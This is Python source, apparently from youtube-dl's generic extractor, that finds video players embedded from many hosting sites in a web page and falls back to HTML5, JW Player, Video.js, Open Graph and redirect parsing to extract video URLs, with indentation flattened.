burl = unescapeHTML(mobj.group(1))
# Don't set the extractor because it can be a track URL or an album
return self.url_result(burl)
# Look for embedded Vevo player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//(?:cache\.)?vevo\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for embedded Viddler player
mobj = re.search(
r'<(?:iframe[^>]+?src|param[^>]+?value)=(["\'])(?P<url>(?:https?:)?//(?:www\.)?viddler\.com/(?:embed|player)/.+?)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for NYTimes player
mobj = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//graphics8\.nytimes\.com/bcvideo/[^/]+/iframe/embed\.html.+?)\1>',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for Libsyn player
mobj = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//html5-player\.libsyn\.com/embed/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for Ooyala videos
mobj = (re.search(r'player\.ooyala\.com/[^"?]+[?#][^"]*?(?:embedCode|ec)=(?P<ec>[^"&]+)', webpage)
or re.search(r'OO\.Player\.create\([\'"].*?[\'"],\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'OO\.Player\.create\.apply\(\s*OO\.Player\s*,\s*op\(\s*\[\s*[\'"][^\'"]*[\'"]\s*,\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'SBN\.VideoLinkset\.ooyala\([\'"](?P<ec>.{32})[\'"]\)', webpage)
or re.search(r'data-ooyala-video-id\s*=\s*[\'"](?P<ec>.{32})[\'"]', webpage))
if mobj is not None:
embed_token = self._search_regex(
r'embedToken[\'"]?\s*:\s*[\'"]([^\'"]+)',
webpage, 'ooyala embed token', default=None)
return OoyalaIE._build_url_result(smuggle_url(
mobj.group('ec'), {
'domain': url,
'embed_token': embed_token,
}))
# Look for multiple Ooyala embeds on SBN network websites
mobj = re.search(r'SBN\.VideoLinkset\.entryGroup\((\[.*?\])', webpage)
if mobj is not None:
embeds = self._parse_json(mobj.group(1), video_id, fatal=False)
if embeds:
return self.playlist_from_matches(
embeds, video_id, video_title,
getter=lambda v: OoyalaIE._url_for_embed_code(smuggle_url(v['provider_video_id'], {'domain': url})), ie='Ooyala')
# Look for Aparat videos
mobj = re.search(r'<iframe .*?src="(http://www\.aparat\.com/video/[^"]+)"', webpage)
if mobj is not None:
return self.url_result(mobj.group(1), 'Aparat')
# Look for MPORA videos
mobj = re.search(r'<iframe .*?src="(http://mpora\.(?:com|de)/videos/[^"]+)"', webpage)
if mobj is not None:
return self.url_result(mobj.group(1), 'Mpora')
# Look for embedded Facebook player
facebook_urls = FacebookIE._extract_urls(webpage)
if facebook_urls:
return self.playlist_from_matches(facebook_urls, video_id, video_title)
# Look for embedded VK player
mobj = re.search(r'<iframe[^>]+?src=(["\'])(?P<url>https?://vk\.com/video_ext\.php.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'VK')
# Look for embedded Odnoklassniki player
odnoklassniki_url = OdnoklassnikiIE._extract_url(webpage)
if odnoklassniki_url:
return self.url_result(odnoklassniki_url, OdnoklassnikiIE.ie_key())
# Look for embedded ivi player
mobj = re.search(r'<embed[^>]+?src=(["\'])(?P<url>https?://(?:www\.)?ivi\.ru/video/player.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Ivi')
# Look for embedded Huffington Post player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://embed\.live\.huffingtonpost\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'HuffPost')
# Look for embed.ly
mobj = re.search(r'class=["\']embedly-card["\'][^>]href=["\'](?P<url>[^"\']+)', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
mobj = re.search(r'class=["\']embedly-embed["\'][^>]src=["\'][^"\']*url=(?P<url>[^&]+)', webpage)
if mobj is not None:
return self.url_result(compat_urllib_parse_unquote(mobj.group('url')))
# Look for funnyordie embed
matches = re.findall(r'<iframe[^>]+?src="(https?://(?:www\.)?funnyordie\.com/embed/[^"]+)"', webpage)
if matches:
return self.playlist_from_matches(
matches, video_id, video_title, getter=unescapeHTML, ie='FunnyOrDie')
# Look for BBC iPlayer embed
matches = re.findall(r'setPlaylist\("(https?://www\.bbc\.co\.uk/iplayer/[^/]+/[\da-z]{8})"\)', webpage)
if matches:
return self.playlist_from_matches(matches, video_id, video_title, ie='BBCCoUk')
# Look for embedded RUTV player
rutv_url = RUTVIE._extract_url(webpage)
if rutv_url:
return self.url_result(rutv_url, 'RUTV')
# Look for embedded TVC player
tvc_url = TVCIE._extract_url(webpage)
if tvc_url:
return self.url_result(tvc_url, 'TVC')
# Look for embedded SportBox player
sportbox_urls = SportBoxIE._extract_urls(webpage)
if sportbox_urls:
return self.playlist_from_matches(sportbox_urls, video_id, video_title, ie=SportBoxIE.ie_key())
# Look for embedded XHamster player
xhamster_urls = XHamsterEmbedIE._extract_urls(webpage)
if xhamster_urls:
return self.playlist_from_matches(xhamster_urls, video_id, video_title, ie='XHamsterEmbed')
# Look for embedded TNAFlixNetwork player
tnaflix_urls = TNAFlixNetworkEmbedIE._extract_urls(webpage)
if tnaflix_urls:
return self.playlist_from_matches(tnaflix_urls, video_id, video_title, ie=TNAFlixNetworkEmbedIE.ie_key())
# Look for embedded PornHub player
pornhub_urls = PornHubIE._extract_urls(webpage)
if pornhub_urls:
return self.playlist_from_matches(pornhub_urls, video_id, video_title, ie=PornHubIE.ie_key())
# Look for embedded DrTuber player
drtuber_urls = DrTuberIE._extract_urls(webpage)
if drtuber_urls:
return self.playlist_from_matches(drtuber_urls, video_id, video_title, ie=DrTuberIE.ie_key())
# Look for embedded RedTube player
redtube_urls = RedTubeIE._extract_urls(webpage)
if redtube_urls:
return self.playlist_from_matches(redtube_urls, video_id, video_title, ie=RedTubeIE.ie_key())
# Look for embedded Tube8 player
tube8_urls = Tube8IE._extract_urls(webpage)
if tube8_urls:
return self.playlist_from_matches(tube8_urls, video_id, video_title, ie=Tube8IE.ie_key())
# Look for embedded Tvigle player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//cloud\.tvigle\.ru/video/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Tvigle')
# Look for embedded TED player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://embed(?:-ssl)?\.ted\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'TED')
# Look for embedded Ustream videos
ustream_url = UstreamIE._extract_url(webpage)
if ustream_url:
return self.url_result(ustream_url, UstreamIE.ie_key())
# Look for embedded arte.tv player
mobj = re.search(
r'<(?:script|iframe) [^>]*?src="(?P<url>http://www\.arte\.tv/(?:playerv2/embed|arte_vp/index)[^"]+)"',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'ArteTVEmbed')
# Look for embedded francetv player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?://)?embed\.francetv\.fr/\?ue=.+?)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for embedded smotri.com player
smotri_url = SmotriIE._extract_url(webpage)
if smotri_url:
return self.url_result(smotri_url, 'Smotri')
# Look for embedded Myvi.ru player
myvi_url = MyviIE._extract_url(webpage)
if myvi_url:
return self.url_result(myvi_url)
# Look for embedded soundcloud player
soundcloud_urls = SoundcloudEmbedIE._extract_urls(webpage)
if soundcloud_urls:
return self.playlist_from_matches(soundcloud_urls, video_id, video_title, getter=unescapeHTML)
# Look for tunein player
tunein_urls = TuneInBaseIE._extract_urls(webpage)
if tunein_urls:
return self.playlist_from_matches(tunein_urls, video_id, video_title)
# Look for embedded mtvservices player
mtvservices_url = MTVServicesEmbeddedIE._extract_url(webpage)
if mtvservices_url:
return self.url_result(mtvservices_url, ie='MTVServicesEmbedded')
# Look for embedded yahoo player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://(?:screen|movies)\.yahoo\.com/.+?\.html\?format=embed)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Yahoo')
# Look for embedded sbs.com.au player
mobj = re.search(
r'''(?x)
(?:
<meta\s+property="og:video"\s+content=|
<iframe[^>]+?src=
)
(["\'])(?P<url>https?://(?:www\.)?sbs\.com\.au/ondemand/video/.+?)\1''',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'SBS')
# Look for embedded Cinchcast player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://player\.cinchcast\.com/.+?)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Cinchcast')
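# Look for embedded MLB player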
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://m(?:lb)?\.mlb\.com/shared/video/embed/embed\.html\?.+?)\1',
webpage)
if not mobj:
mobj = re.search(
r'data-video-link=["\'](?P<url>http://m.mlb.com/video/[^"\']+)',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'MLB')
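# Look for CondeNast embeds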
mobj = re.search(
r'<(?:iframe|script)[^>]+?src=(["\'])(?P<url>%s)\1' % CondeNastIE.EMBED_URL,
webpage)
if mobj is not None:
return self.url_result(self._proto_relative_url(mobj.group('url'), scheme='http:'), 'CondeNast')
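# Look for embedded Livestream player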
mobj = re.search(
r'<iframe[^>]+src="(?P<url>https?://(?:new\.)?livestream\.com/[^"]+/player[^"]+)"',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Livestream')
# Look for Zapiks embed
mobj = re.search(
r'<iframe[^>]+src="(?P<url>https?://(?:www\.)?zapiks\.fr/index\.php\?.+?)"', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Zapiks')
# Look for Kaltura embeds
kaltura_url = KalturaIE._extract_url(webpage)
if kaltura_url:
return self.url_result(smuggle_url(kaltura_url, {'source_url': url}), KalturaIE.ie_key())
# Look for EaglePlatform embeds
eagleplatform_url = EaglePlatformIE._extract_url(webpage)
if eagleplatform_url:
return self.url_result(smuggle_url(eagleplatform_url, {'referrer': url}), EaglePlatformIE.ie_key())
# Look for ClipYou (uses EaglePlatform) embeds
mobj = re.search(
r'<iframe[^>]+src="https?://(?P<host>media\.clipyou\.ru)/index/player\?.*\brecord_id=(?P<id>\d+).*"', webpage)
if mobj is not None:
return self.url_result('eagleplatform:%(host)s:%(id)s' % mobj.groupdict(), 'EaglePlatform')
# Look for Pladform embeds
pladform_url = PladformIE._extract_url(webpage)
if pladform_url:
return self.url_result(pladform_url)
# Look for Videomore embeds
videomore_url = VideomoreIE._extract_url(webpage)
if videomore_url:
return self.url_result(videomore_url)
# Look for Webcaster embeds
webcaster_url = WebcasterFeedIE._extract_url(self, webpage)
if webcaster_url:
return self.url_result(webcaster_url, ie=WebcasterFeedIE.ie_key())
# Look for Playwire embeds
mobj = re.search(
r'<script[^>]+data-config=(["\'])(?P<url>(?:https?:)?//config\.playwire\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for 5min embeds
mobj = re.search(
r'<meta[^>]+property="og:video"[^>]+content="https?://embed\.5min\.com/(?P<id>[0-9]+)/?', webpage)
if mobj is not None:
return self.url_result('5min:%s' % mobj.group('id'), 'FiveMin')
# Look for Crooks and Liars embeds
mobj = re.search(
r'<(?:iframe[^>]+src|param[^>]+value)=(["\'])(?P<url>(?:https?:)?//embed\.crooksandliars\.com/(?:embed|v)/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for NBC Sports VPlayer embeds
nbc_sports_url = NBCSportsVPlayerIE._extract_url(webpage)
if nbc_sports_url:
return self.url_result(nbc_sports_url, 'NBCSportsVPlayer')
# Look for NBC News embeds
nbc_news_embed_url = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//www\.nbcnews\.com/widget/video-embed/[^"\']+)\1', webpage)
if nbc_news_embed_url:
return self.url_result(nbc_news_embed_url.group('url'), 'NBCNews')
# Look for Google Drive embeds
google_drive_url = GoogleDriveIE._extract_url(webpage)
if google_drive_url:
return self.url_result(google_drive_url, 'GoogleDrive')
# Look for UDN embeds
mobj = re.search(
r'<iframe[^>]+src="(?:https?:)?(?P<url>%s)"' % UDNEmbedIE._PROTOCOL_RELATIVE_VALID_URL, webpage)
if mobj is not None:
return self.url_result(
compat_urlparse.urljoin(url, mobj.group('url')), 'UDNEmbed')
# Look for Senate ISVP iframe
senate_isvp_url = SenateISVPIE._search_iframe_url(webpage)
if senate_isvp_url:
return self.url_result(senate_isvp_url, 'SenateISVP')
# Look for Kinja embeds
kinja_embed_urls = KinjaEmbedIE._extract_urls(webpage, url)
if kinja_embed_urls:
return self.playlist_from_matches(
kinja_embed_urls, video_id, video_title)
# Look for OnionStudios embeds
onionstudios_url = OnionStudiosIE._extract_url(webpage)
if onionstudios_url:
return self.url_result(onionstudios_url)
# Look for ViewLift embeds
viewlift_url = ViewLiftEmbedIE._extract_url(webpage)
if viewlift_url:
return self.url_result(viewlift_url)
# Look for JWPlatform embeds
jwplatform_urls = JWPlatformIE._extract_urls(webpage)
if jwplatform_urls:
return self.playlist_from_matches(jwplatform_urls, video_id, video_title, ie=JWPlatformIE.ie_key())
# Look for Digiteka embeds
digiteka_url = DigitekaIE._extract_url(webpage)
if digiteka_url:
return self.url_result(self._proto_relative_url(digiteka_url), DigitekaIE.ie_key())
# Look for Arkena embeds
arkena_url = ArkenaIE._extract_url(webpage)
if arkena_url:
return self.url_result(arkena_url, ArkenaIE.ie_key())
# Look for Piksel embeds
piksel_url = PikselIE._extract_url(webpage)
if piksel_url:
return self.url_result(piksel_url, PikselIE.ie_key())
# Look for Limelight embeds
limelight_urls = LimelightBaseIE._extract_urls(webpage, url)
if limelight_urls:
return self.playlist_result(
limelight_urls, video_id, video_title, video_description)
# Look for Anvato embeds
anvato_urls = AnvatoIE._extract_urls(self, webpage, video_id)
if anvato_urls:
return self.playlist_result(
anvato_urls, video_id, video_title, video_description)
# Look for AdobeTVVideo embeds
mobj = re.search(
r'<iframe[^>]+src=[\'"]((?:https?:)?//video\.tv\.adobe\.com/v/\d+[^"]+)[\'"]',
webpage)
if mobj is not None:
return self.url_result(
self._proto_relative_url(unescapeHTML(mobj.group(1))),
'AdobeTVVideo')
# Look for Vine embeds
mobj = re.search(
r'<iframe[^>]+src=[\'"]((?:https?:)?//(?:www\.)?vine\.co/v/[^/]+/embed/(?:simple|postcard))',
webpage)
if mobj is not None:
return self.url_result(
self._proto_relative_url(unescapeHTML(mobj.group(1))), 'Vine')
# Look for VODPlatform embeds
mobj = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//(?:(?:www\.)?vod-platform\.net|embed\.kwikmotion\.com)/[eE]mbed/.+?)\1',
webpage)
if mobj is not None:
return self.url_result(
self._proto_relative_url(unescapeHTML(mobj.group('url'))), 'VODPlatform')
# Look for Mangomolo embeds
mobj = re.search(
r'''(?x)<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//
(?:
admin\.mangomolo\.com/analytics/index\.php/customers/embed|
player\.mangomolo\.com/v1
)/
(?:
video\?.*?\bid=(?P<video_id>\d+)|
(?:index|live)\?.*?\bchannelid=(?P<channel_id>(?:[A-Za-z0-9+/=]|%2B|%2F|%3D)+)
).+?)\1''', webpage)
if mobj is not None:
info = {
'_type': 'url_transparent',
'url': self._proto_relative_url(unescapeHTML(mobj.group('url'))),
'title': video_title,
'description': video_description,
'thumbnail': video_thumbnail,
'uploader': video_uploader,
}
video_id = mobj.group('video_id')
if video_id:
info.update({
'ie_key': 'MangomoloVideo',
'id': video_id,
})
else:
info.update({
'ie_key': 'MangomoloLive',
'id': mobj.group('channel_id'),
})
return info
# Look for Instagram embeds
instagram_embed_url = InstagramIE._extract_embed_url(webpage)
if instagram_embed_url is not None:
return self.url_result(
self._proto_relative_url(instagram_embed_url), InstagramIE.ie_key())
# Look for LiveLeak embeds
liveleak_urls = LiveLeakIE._extract_urls(webpage)
if liveleak_urls:
return self.playlist_from_matches(liveleak_urls, video_id, video_title)
# Look for 3Q SDN embeds
threeqsdn_url = ThreeQSDNIE._extract_url(webpage)
if threeqsdn_url:
return {
'_type': 'url_transparent',
'ie_key': ThreeQSDNIE.ie_key(),
'url': self._proto_relative_url(threeqsdn_url),
'title': video_title,
'description': video_description,
'thumbnail': video_thumbnail,
'uploader': video_uploader,
}
# Look for VBOX7 embeds
vbox7_url = Vbox7IE._extract_url(webpage)
if vbox7_url:
return self.url_result(vbox7_url, Vbox7IE.ie_key())
# Look for DBTV embeds
dbtv_urls = DBTVIE._extract_urls(webpage)
if dbtv_urls:
return self.playlist_from_matches(dbtv_urls, video_id, video_title, ie=DBTVIE.ie_key())
# Look for Videa embeds
videa_urls = VideaIE._extract_urls(webpage)
if videa_urls:
return self.playlist_from_matches(videa_urls, video_id, video_title, ie=VideaIE.ie_key())
# Look for 20 minuten embeds
twentymin_urls = TwentyMinutenIE._extract_urls(webpage)
if twentymin_urls:
return self.playlist_from_matches(
twentymin_urls, video_id, video_title, ie=TwentyMinutenIE.ie_key())
# Look for VideoPress embeds
videopress_urls = VideoPressIE._extract_urls(webpage)
if videopress_urls:
return self.playlist_from_matches(
videopress_urls, video_id, video_title, ie=VideoPressIE.ie_key())
# Look for Rutube embeds
rutube_urls = RutubeIE._extract_urls(webpage)
if rutube_urls:
return self.playlist_from_matches(
rutube_urls, video_id, video_title, ie=RutubeIE.ie_key())
# Look for WashingtonPost embeds
wapo_urls = WashingtonPostIE._extract_urls(webpage)
if wapo_urls:
return self.playlist_from_matches(
wapo_urls, video_id, video_title, ie=WashingtonPostIE.ie_key())
# Look for Mediaset embeds
mediaset_urls = MediasetIE._extract_urls(self, webpage)
if mediaset_urls:
return self.playlist_from_matches(
mediaset_urls, video_id, video_title, ie=MediasetIE.ie_key())
# Look for JOJ.sk embeds
joj_urls = JojIE._extract_urls(webpage)
if joj_urls:
return self.playlist_from_matches(
joj_urls, video_id, video_title, ie=JojIE.ie_key())
# Look for megaphone.fm embeds
mpfn_urls = MegaphoneIE._extract_urls(webpage)
if mpfn_urls:
return self.playlist_from_matches(
mpfn_urls, video_id, video_title, ie=MegaphoneIE.ie_key())
# Look for vzaar embeds
vzaar_urls = VzaarIE._extract_urls(webpage)
if vzaar_urls:
return self.playlist_from_matches(
vzaar_urls, video_id, video_title, ie=VzaarIE.ie_key())
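# Look for Channel 9 embeds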
channel9_urls = Channel9IE._extract_urls(webpage)
if channel9_urls:
return self.playlist_from_matches(
channel9_urls, video_id, video_title, ie=Channel9IE.ie_key())
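# Look for VShare embeds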
vshare_urls = VShareIE._extract_urls(webpage)
if vshare_urls:
return self.playlist_from_matches(
vshare_urls, video_id, video_title, ie=VShareIE.ie_key())
# Look for Mediasite embeds
mediasite_urls = MediasiteIE._extract_urls(webpage)
if mediasite_urls:
entries = [
self.url_result(smuggle_url(
compat_urlparse.urljoin(url, mediasite_url),
{'UrlReferrer': url}), ie=MediasiteIE.ie_key())
for mediasite_url in mediasite_urls]
return self.playlist_result(entries, video_id, video_title)
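# Look for SpringboardPlatform embeds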
springboardplatform_urls = SpringboardPlatformIE._extract_urls(webpage)
if springboardplatform_urls:
return self.playlist_from_matches(
springboardplatform_urls, video_id, video_title,
ie=SpringboardPlatformIE.ie_key())
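# Look for YapFiles embeds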
yapfiles_urls = YapFilesIE._extract_urls(webpage)
if yapfiles_urls:
return self.playlist_from_matches(
yapfiles_urls, video_id, video_title, ie=YapFilesIE.ie_key())
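# Look for Vice embeds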
vice_urls = ViceIE._extract_urls(webpage)
if vice_urls:
return self.playlist_from_matches(
vice_urls, video_id, video_title, ie=ViceIE.ie_key())
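# Look for XFileShare embeds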
xfileshare_urls = XFileShareIE._extract_urls(webpage)
if xfileshare_urls:
return self.playlist_from_matches(
xfileshare_urls, video_id, video_title, ie=XFileShareIE.ie_key())
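# Look for Cloudflare Stream embeds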
cloudflarestream_urls = CloudflareStreamIE._extract_urls(webpage)
if cloudflarestream_urls:
return self.playlist_from_matches(
cloudflarestream_urls, video_id, video_title, ie=CloudflareStreamIE.ie_key())
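# Look for PeerTube embeds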
peertube_urls = PeerTubeIE._extract_urls(webpage, url)
if peertube_urls:
return self.playlist_from_matches(
peertube_urls, video_id, video_title, ie=PeerTubeIE.ie_key())
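# Look for Teachable embeds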
teachable_url = TeachableIE._extract_url(webpage, url)
if teachable_url:
return self.url_result(teachable_url)
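# Look for Indavideo embeds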
indavideo_urls = IndavideoEmbedIE._extract_urls(webpage)
if indavideo_urls:
return self.playlist_from_matches(
indavideo_urls, video_id, video_title, ie=IndavideoEmbedIE.ie_key())
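# Look for APA embeds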
apa_urls = APAIE._extract_urls(webpage)
if apa_urls:
return self.playlist_from_matches(
apa_urls, video_id, video_title, ie=APAIE.ie_key())
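# Look for FoxNews embeds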
foxnews_urls = FoxNewsIE._extract_urls(webpage)
if foxnews_urls:
return self.playlist_from_matches(
foxnews_urls, video_id, video_title, ie=FoxNewsIE.ie_key())
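# Look for share-videos.se embeds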
sharevideos_urls = [sharevideos_mobj.group('url') for sharevideos_mobj in re.finditer(
r'<iframe[^>]+?\bsrc\s*=\s*(["\'])(?P<url>(?:https?:)?//embed\.share-videos\.se/auto/embed/\d+\?.*?\buid=\d+.*?)\1',
webpage)]
if sharevideos_urls:
return self.playlist_from_matches(
sharevideos_urls, video_id, video_title)
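# Look for Viqeo embeds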
viqeo_urls = ViqeoIE._extract_urls(webpage)
if viqeo_urls:
return self.playlist_from_matches(
viqeo_urls, video_id, video_title, ie=ViqeoIE.ie_key())
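# Look for Expressen embeds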
expressen_urls = ExpressenIE._extract_urls(webpage)
if expressen_urls:
return self.playlist_from_matches(
expressen_urls, video_id, video_title, ie=ExpressenIE.ie_key())
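# Look for Zype embeds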
zype_urls = ZypeIE._extract_urls(webpage)
if zype_urls:
return self.playlist_from_matches(
zype_urls, video_id, video_title, ie=ZypeIE.ie_key())
# Look for HTML5 media
entries = self._parse_html5_media_entries(url, webpage, video_id, m3u8_id='hls')
if entries:
if len(entries) == 1:
entries[0].update({
'id': video_id,
'title': video_title,
})
else:
for num, entry in enumerate(entries, start=1):
entry.update({
'id': '%s-%s' % (video_id, num),
'title': '%s (%d)' % (video_title, num),
})
for entry in entries:
self._sort_formats(entry['formats'])
return self.playlist_result(entries, video_id, video_title)
jwplayer_data = self._find_jwplayer_data(
webpage, video_id, transform_source=js_to_json)
if jwplayer_data:
try:
info = self._parse_jwplayer_data(
jwplayer_data, video_id, require_title=False, base_url=url)
return merge_dicts(info, info_dict)
except ExtractorError:
# See https://github.com/ytdl-org/youtube-dl/pull/16735
pass
# Video.js embed
mobj = re.search(
r'(?s)\bvideojs\s*\(.+?\.src\s*\(\s*((?:\[.+?\]|{.+?}))\s*\)\s*;',
webpage)
if mobj is not None:
sources = self._parse_json(
mobj.group(1), video_id, transform_source=js_to_json,
fatal=False) or []
if not isinstance(sources, list):
sources = [sources]
formats = []
for source in sources:
src = source.get('src')
if not src or not isinstance(src, compat_str):
continue
src = compat_urlparse.urljoin(url, src)
src_type = source.get('type')
if isinstance(src_type, compat_str):
src_type = src_type.lower()
ext = determine_ext(src).lower()
if src_type == 'video/youtube':
return self.url_result(src, YoutubeIE.ie_key())
if src_type == 'application/dash+xml' or ext == 'mpd':
formats.extend(self._extract_mpd_formats(
src, video_id, mpd_id='dash', fatal=False))
elif src_type == 'application/x-mpegurl' or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
src, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id='hls', fatal=False))
else:
formats.append({
'url': src,
'ext': (mimetype2ext(src_type)
or ext if ext in KNOWN_EXTENSIONS else 'mp4'),
})
if formats:
self._sort_formats(formats)
info_dict['formats'] = formats
return info_dict
# Looking for http://schema.org/VideoObject
json_ld = self._search_json_ld(
webpage, video_id, default={}, expected_type='VideoObject')
if json_ld.get('url'):
return merge_dicts(json_ld, info_dict)
def check_video(vurl):
if YoutubeIE.suitable(vurl):
return True
if RtmpIE.suitable(vurl):
return True
vpath = compat_urlparse.urlparse(vurl).path
vext = determine_ext(vpath)
return '.' in vpath and vext not in ('swf', 'png', 'jpg', 'srt', 'sbv', 'sub', 'vtt', 'ttml', 'js', 'xml')
def filter_video(urls):
return list(filter(check_video, urls))
# Start with something easy: JW Player in SWFObject
found = filter_video(re.findall(r'flashvars: [\'"](?:.*&)?file=(http[^\'"&]*)', webpage))
if not found:
# Look for gorilla-vid style embedding
found = filter_video(re.findall(r'''(?sx)
(?:
jw_plugins|
JWPlayerOptions|
jwplayer\s*\(\s*["'][^'"]+["']\s*\)\s*\.setup
)
.*?
['"]?file['"]?\s*:\s*["\'](.*?)["\']''', webpage))
if not found:
# Broaden the search a little bit
found = filter_video(re.findall(r'[^A-Za-z0-9]?(?:file|source)=(http[^\'"&]*)', webpage))
if not found:
# Broaden the findall a little bit: JWPlayer JS loader
found = filter_video(re.findall(
r'[^A-Za-z0-9]?(?:file|video_url)["\']?:\s*["\'](http(?![^\'"]+\.[0-9]+[\'"])[^\'"]+)["\']', webpage))
if not found:
# Flow player
found = filter_video(re.findall(r'''(?xs)
flowplayer\("[^"]+",\s*
\{[^}]+?\}\s*,
\s*\{[^}]+? ["']?clip["']?\s*:\s*\{\s*
["']?url["']?\s*:\s*["']([^"']+)["']
''', webpage))
if not found:
# Cinerama player
found = re.findall(
r"cinerama\.embedPlayer\(\s*\'[^']+\',\s*'([^']+)'", webpage)
if not found:
# Try to find twitter cards info
# twitter:player:stream should be checked before twitter:player since
# it is expected to contain a raw stream (see
# https://dev.twitter.com/cards/types/player#On_twitter.com_via_desktop_browser)
found = filter_video(re.findall(
r'<meta (?:property|name)="twitter:player:stream" (?:content|value)="(.+?)"', webpage))
if not found:
# We look for Open Graph info:
            # We have to match any number of spaces between elements, since some sites try to align them (e.g. statigr.am)
m_video_type = re.findall(r'<meta.*?property="og:video:type".*?content="video/(.*?)"', webpage)
# We only look in og:video if the MIME type is a video, don't try if it's a Flash player:
if m_video_type is not None:
found = filter_video(re.findall(r'<meta.*?property="og:video".*?content="(.*?)"', webpage))
if not found:
REDIRECT_REGEX = r'[0-9]{,2};\s*(?:URL|url)=\'?([^\'"]+)'
found = re.search(
r'(?i)<meta\s+(?=(?:[a-z-]+="[^"]+"\s+)*http-equiv="refresh")'
r'(?:[a-z-]+="[^"]+"\s+)*?content="%s' % REDIRECT_REGEX,
webpage)
if not found:
# Look also in Refresh HTTP header
refresh_header = head_response.headers.get('Refresh')
if refresh_header:
# In python 2 response HTTP headers are bytestrings
if sys.version_info < (3, 0) and isinstance(refresh_header, str):
refresh_header = refresh_header.decode('iso-8859-1')
found = re.search(REDIRECT_REGEX, refresh_header)
if found:
new_url = compat_urlparse.urljoin(url, unescapeHTML(found.group(1)))
if new_url != url:
self.report_following_redirect(new_url)
return {
'_type': 'url',
'url': new_url,
}
else:
found = None
if not found:
            # twitter:player is an https URL to an iframe player that may or may not
            # be supported by youtube-dl, so it is checked last (see
            # https://dev.twitter.com/cards/types/player#On_twitter.com_via_desktop_browser)
embed_url = self._html_search_meta('twitter:player', webpage, default=None)
if embed_url and embed_url != url:
return self.url_result(embed_url)
if not found:
raise UnsupportedError(url)
entries = []
for video_url in orderedSet(found):
video_url = unescapeHTML(video_url)
video_url = video_url.replace('\\/', '/')
video_url = compat_urlparse.urljoin(url, video_url)
video_id = compat_urllib_parse_unquote(os.path.basename(video_url))
# Sometimes, jwplayer extraction will result in a YouTube URL
if YoutubeIE.suitable(video_url):
entries.append(self.url_result(video_url, 'Youtube'))
continue
# here's a fun little line of code for you:
video_id = os.path.splitext(video_id)[0]
entry_info_dict = {
'id': video_id,
'uploader': video_uploader,
'title': video_title,
'age_limit': age_limit,
}
if RtmpIE.suitable(video_url):
entry_info_dict.update({
'_type': 'url_transparent',
'ie_key': RtmpIE.ie_key(),
'url': video_url,
})
entries.append(entry_info_dict)
continue
ext = determine_ext(video_url)
if ext == 'smil':
entry_info_dict['formats'] = self._extract_smil_formats(video_url, video_id)
elif ext == 'xspf':
return self.playlist_result(self._extract_xspf_playlist(video_url, video_id), video_id)
elif ext == 'm3u8':
entry_info_dict['formats'] = self._extract_m3u8_formats(video_url, video_id, ext='mp4')
elif ext == 'mpd':
entry_info_dict['formats'] = self._extract_mpd_formats(video_url, video_id)
elif ext == 'f4m':
entry_info_dict['formats'] = self._extract_f4m_formats(video_url, video_id)
elif re.search(r'(?i)\.(?:ism|smil)/manifest', video_url) and video_url != url:
# Just matching .ism/manifest is not enough to be reliably sure
# whether it's actually an ISM manifest or some other streaming
# manifest since there are various streaming URL formats
# possible (see [1]) as well as some other shenanigans like
# .smil/manifest URLs that actually serve an ISM (see [2]) and
# so on.
# Thus the most reasonable way to solve this is to delegate
# to generic extractor in order to look into the contents of
# the manifest itself.
# 1. https://azure.microsoft.com/en-us/documentation/articles/media-services-deliver-content-overview/#streaming-url-formats
# 2. https://svs.itworkscdn.net/lbcivod/smil:itwfcdn/lbci/170976.smil/Manifest
entry_info_dict = self.url_result(
smuggle_url(video_url, {'to_generic': True}),
GenericIE.ie_key())
else:
entry_info_dict['url'] = video_url
if entry_info_dict.get('formats'):
self._sort_formats(entry_info_dict['formats'])
entries.append(entry_info_dict)
if len(entries) == 1:
return entries[0]
else:
for num, e in enumerate(entries, start=1):
# 'url' results don't have a title
if e.get('title') is not None:
e['title'] = '%s (%d)' % (e['title'], num)
return {
'_type': 'playlist',
'entries': entries,
}
|
the-stack_106_14763
|
#!/usr/bin/env python
import argparse, collections, psycopg2, os, subprocess, sys, tempfile
